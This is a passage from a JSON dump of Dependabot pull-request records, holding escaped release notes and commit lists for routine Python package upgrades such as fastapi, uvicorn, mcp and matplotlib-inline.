href=\"https://github.com/ipython/matplotlib-inline/commit/0aac2e223483ffbfb5a6076d8c2ca83545cca440\"\u003e\u003ccode\u003e0aac2e2\u003c/code\u003e\u003c/a\u003e Bump the actions group across 1 directory with 2 updates (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/6eb2bd89dc8d4d6678478c6b2ec15be7b20d3374\"\u003e\u003ccode\u003e6eb2bd8\u003c/code\u003e\u003c/a\u003e Bump the actions group across 1 directory with 2 updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/631d7dd26be1287f64c5bd4bbb84888903e419b0\"\u003e\u003ccode\u003e631d7dd\u003c/code\u003e\u003c/a\u003e Zizmor hardening (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/66\"\u003e#66\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/8d45c8fc427d39750751bdaa0ffe5abc8e30cd50\"\u003e\u003ccode\u003e8d45c8f\u003c/code\u003e\u003c/a\u003e Zizmor hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/f830b37c728146dca4f947de6cbdb420ee9c69fb\"\u003e\u003ccode\u003ef830b37\u003c/code\u003e\u003c/a\u003e Specify BSD license and add license files (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/62\"\u003e#62\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/e3b8bb10d275d5caa97d8d1b584d48797e494de4\"\u003e\u003ccode\u003ee3b8bb1\u003c/code\u003e\u003c/a\u003e Deprecate Python 3.9 in CI pipeline\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/c783ae72ed581f24fa136f34e6df4f6e99c3f785\"\u003e\u003ccode\u003ec783ae7\u003c/code\u003e\u003c/a\u003e Deprecate Python 3.9 in CI pipeline\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/8ac056c5730a6adbc9dd5e049b85163ba6a09a28\"\u003e\u003ccode\u003e8ac056c\u003c/code\u003e\u003c/a\u003e Update workflow to include matplotlib for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/0cc8a2e91306c94e36f0a9cd8e31a38299b1c126\"\u003e\u003ccode\u003e0cc8a2e\u003c/code\u003e\u003c/a\u003e Use valid SPDX ID\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/matplotlib-inline/compare/0.2.1...0.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mcp` from 1.27.0 to 1.27.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/modelcontextprotocol/python-sdk/releases\"\u003emcp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.27.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[v1.x] ci: deploy docs to py.sdk.modelcontextprotocol.io via Pages artifact by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/modelcontextprotocol/python-sdk/pull/2635\"\u003emodelcontextprotocol/python-sdk#2635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[v1.x] Add subject and claims to AccessToken by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/modelcontextprotocol/python-sdk/pull/2690\"\u003emodelcontextprotocol/python-sdk#2690\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[v1.x] Bind transport sessions to the authenticated principal by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/joshuwajosh/ForexMindfortemprory/pull/12","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/joshuwajosh%2FForexMindfortemprory/issues/12","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/12/packages"},{"uuid":"4560805006","node_id":"PR_kwDORInWC87hPp17","number":150,"state":"open","title":"deps(pip): Bump the minor-and-patch group across 1 directory with 10 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-01T06:17:12.000Z","updated_at":"2026-06-01T06:18:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(pip): Bump","group_name":"minor-and-patch","update_count":10,"packages":[{"name":"fastapi","old_version":"0.136.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.45.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.3","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pandas","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/pandas-dev/pandas"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"reportlab","old_version":"4.4.10","new_version":"4.5.1"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"stripe","old_version":"15.1.0","new_version":"15.2.0","repository_url":"https://github.com/stripe/stripe-python"},{"name":"sentry-sdk","old_version":"2.58.0","new_version":"2.61.0","repository_url":"https://github.com/getsentry/sentry-python"}],"path":null,"ecosystem":"pip"},"body":"Bumps the minor-and-patch group with 10 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.1` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.45.0` | `0.48.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.3` | `2.13.4` |\n| [pandas](https://github.com/pandas-dev/pandas) | `3.0.2` | `3.0.3` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.30` |\n| [reportlab](https://www.reportlab.com/) | `4.4.10` | `4.5.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [stripe](https://github.com/stripe/stripe-python) | `15.1.0` | `15.2.0` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.58.0` | `2.61.0` |\n\n\nUpdates `fastapi` from 0.136.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.136.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.45.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca 